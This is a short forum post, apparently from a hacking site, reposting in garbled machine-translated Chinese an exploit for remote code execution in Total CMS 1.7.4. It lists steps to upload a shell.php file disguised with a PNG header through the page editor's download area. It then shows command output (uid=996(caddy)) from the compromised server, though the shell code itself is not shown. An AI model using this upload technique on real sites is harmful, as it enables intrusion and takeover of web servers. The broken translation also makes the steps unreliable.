H

总CMS 1.7.4-远程代码执行(RCE)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:总CMS 1.7.4-远程代码执行(RCE)
#日期: 02/06/2023
#利用作者: TMRSWRR
#版本: 1.7.4
#供应商家庭页面: https://www.totalcms.co/
1)转到此页面,然后单击编辑页面按钮
2)倒下后,您会看到下载区域
3)添加此区域shell.php文件
?png
.


4)打开此文件并写下命令后
结果:
?PNG .
uid=996(caddy)gid=998(caddy)组=998(caddy),33(www-data)
 
后退
顶部